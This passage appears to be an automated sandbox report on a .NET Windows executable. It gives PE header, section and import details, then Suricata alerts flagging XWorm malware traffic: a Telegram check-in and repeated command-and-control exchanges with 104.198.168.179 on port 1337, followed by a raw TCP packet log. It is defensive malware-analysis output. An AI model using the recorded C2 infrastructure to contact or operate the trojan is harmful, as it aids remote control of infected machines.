                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x162a80x53.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x180000x4ce.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a0000xc.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x20000x143040x14400b2be1f6f1bfc65fc3c4a3fc60f4419ddFalse0.6075544945987654data6.069007239627802IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rsrc0x180000x4ce0x6007be5f4e146d6be4867ab3153d9398091False0.373046875data3.7127590787932885IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x1a0000xc0x200d1bf243a2397e1e9e1b146da36d98cd1False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_VERSION0x180a00x244data0.4689655172413793
                                                RT_MANIFEST0x182e40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                Imports

                                                DLLImport
                                                mscoree.dll_CorExeMain

                                                Network Behavior

                                                Suricata IDS Alerts

                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-11-23T21:05:09.461983+01002853685ETPRO MALWARE Win32/XWorm Checkin via Telegram1192.168.2.449731149.154.167.220443TCP
                                                2024-11-23T21:05:22.034934+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:05:22.397821+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:05:22.465831+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:05:35.078050+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:05:35.078050+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:05:35.451440+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:05:35.453664+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:05:46.991636+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:05:46.994001+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:05:59.267623+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:05:59.277702+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:05.101176+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:05.101176+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:11.549167+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:11.559813+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:13.131562+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:13.137609+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:14.643237+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:14.645165+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:14.853519+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:14.855413+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:20.167925+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:20.174352+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:25.137384+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:25.181200+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:25.347308+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:25.360656+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:25.513261+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:25.519507+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:30.676427+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:30.678923+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:30.925272+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:31.032166+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:31.034909+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:31.054378+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:35.112652+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:35.112652+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:41.039461+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:41.453248+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:41.533917+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:41.577525+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:41.697319+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:51.654773+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:51.658601+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:51.865118+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:51.868469+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:06:52.611373+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:06:52.613190+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:07:04.881338+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:04.886631+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:07:05.114900+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:05.114900+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:06.522645+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:06.524879+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:07:08.971165+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:08.973095+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:07:21.272547+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:21.275253+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:07:26.353000+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:26.355168+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:07:28.957630+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:28.959846+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:07:30.374088+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:30.376164+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:07:35.152096+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:35.152096+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:35.583856+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:35.592877+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:07:44.662640+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:44.665162+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:07:47.910781+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:47.913494+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:07:48.808516+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:48.810715+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:07:55.471231+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:55.473795+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:07:55.962843+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:07:55.964678+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:03.766636+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:04.155869+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:04.165772+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:05.095467+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:05.095467+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:06.675480+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:06.729947+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:06.899211+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:07.064909+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:17.083526+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:17.086072+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:27.724238+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:27.730954+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:27.973037+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:27.975903+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:28.743924+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:28.746440+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:35.150293+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:35.150293+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:37.728440+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:37.730791+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:42.957033+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:42.958984+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:43.203569+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:43.325613+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:48.144468+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:48.149101+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:53.227048+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:53.229056+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:57.895371+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:57.984436+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:08:58.227147+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:08:58.231872+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:09:04.665319+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:09:04.667440+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:09:05.094644+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:09:05.094644+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:09:06.781238+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:09:06.782274+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP
                                                2024-11-23T21:09:19.091410+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1104.198.168.1791337192.168.2.449732TCP
                                                2024-11-23T21:09:19.092806+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449732104.198.168.1791337TCP

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 23, 2024 21:05:04.502347946 CET4973080192.168.2.4208.95.112.1
                                                Nov 23, 2024 21:05:04.623373032 CET8049730208.95.112.1192.168.2.4
                                                Nov 23, 2024 21:05:04.623627901 CET4973080192.168.2.4208.95.112.1
                                                Nov 23, 2024 21:05:04.624641895 CET4973080192.168.2.4208.95.112.1
                                                Nov 23, 2024 21:05:04.744086027 CET8049730208.95.112.1192.168.2.4
                                                Nov 23, 2024 21:05:05.768939972 CET8049730208.95.112.1192.168.2.4
                                                Nov 23, 2024 21:05:05.810699940 CET4973080192.168.2.4208.95.112.1
                                                Nov 23, 2024 21:05:07.423017979 CET49731443192.168.2.4149.154.167.220
                                                Nov 23, 2024 21:05:07.423063040 CET44349731149.154.167.220192.168.2.4
                                                Nov 23, 2024 21:05:07.423134089 CET49731443192.168.2.4149.154.167.220
                                                Nov 23, 2024 21:05:07.438455105 CET49731443192.168.2.4149.154.167.220
                                                Nov 23, 2024 21:05:07.438465118 CET44349731149.154.167.220192.168.2.4
                                                Nov 23, 2024 21:05:08.927505970 CET44349731149.154.167.220192.168.2.4
                                                Nov 23, 2024 21:05:08.927659988 CET49731443192.168.2.4149.154.167.220
                                                Nov 23, 2024 21:05:08.932110071 CET49731443192.168.2.4149.154.167.220
                                                Nov 23, 2024 21:05:08.932126045 CET44349731149.154.167.220192.168.2.4
                                                Nov 23, 2024 21:05:08.932463884 CET44349731149.154.167.220192.168.2.4
                                                Nov 23, 2024 21:05:08.982691050 CET49731443192.168.2.4149.154.167.220
                                                Nov 23, 2024 21:05:08.990185976 CET49731443192.168.2.4149.154.167.220
                                                Nov 23, 2024 21:05:09.035326958 CET44349731149.154.167.220192.168.2.4
                                                Nov 23, 2024 21:05:09.462024927 CET44349731149.154.167.220192.168.2.4
                                                Nov 23, 2024 21:05:09.462102890 CET44349731149.154.167.220192.168.2.4
                                                Nov 23, 2024 21:05:09.462165117 CET49731443192.168.2.4149.154.167.220
                                                Nov 23, 2024 21:05:09.480619907 CET49731443192.168.2.4149.154.167.220
                                                Nov 23, 2024 21:05:09.601552963 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:05:09.721317053 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:09.726185083 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:05:09.759293079 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:05:09.885807037 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:22.034934044 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:05:22.154818058 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:22.397820950 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:22.454350948 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:05:22.465831041 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:05:22.585860968 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:34.348961115 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:05:34.654541016 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:05:34.967081070 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:05:35.078049898 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:35.123477936 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:05:35.208370924 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:35.208405018 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:35.208431959 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:35.451440096 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:35.453664064 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:05:35.574995041 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:46.623939037 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:05:46.748509884 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:46.991636038 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:46.994000912 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:05:47.117695093 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:57.727140903 CET8049730208.95.112.1192.168.2.4
                                                Nov 23, 2024 21:05:57.727363110 CET4973080192.168.2.4208.95.112.1
                                                Nov 23, 2024 21:05:58.905085087 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:05:59.024771929 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:59.267622948 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:05:59.277702093 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:05:59.397228003 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:05.101176023 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:05.156215906 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:11.186728001 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:11.306243896 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:11.549166918 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:11.559813023 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:11.680452108 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:12.765496016 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:12.885066986 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:13.131561995 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:13.137609005 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:13.257400036 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:14.280556917 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:14.400243044 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:14.400299072 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:14.520039082 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:14.643237114 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:14.645164967 CET497321337192.168.2.4104.198.168.179
                                                Nov 23, 2024 21:06:14.771534920 CET133749732104.198.168.179192.168.2.4
                                                Nov 23, 2024 21:06:14.853518963 CET133749732104.198.168.179192.168.2.4
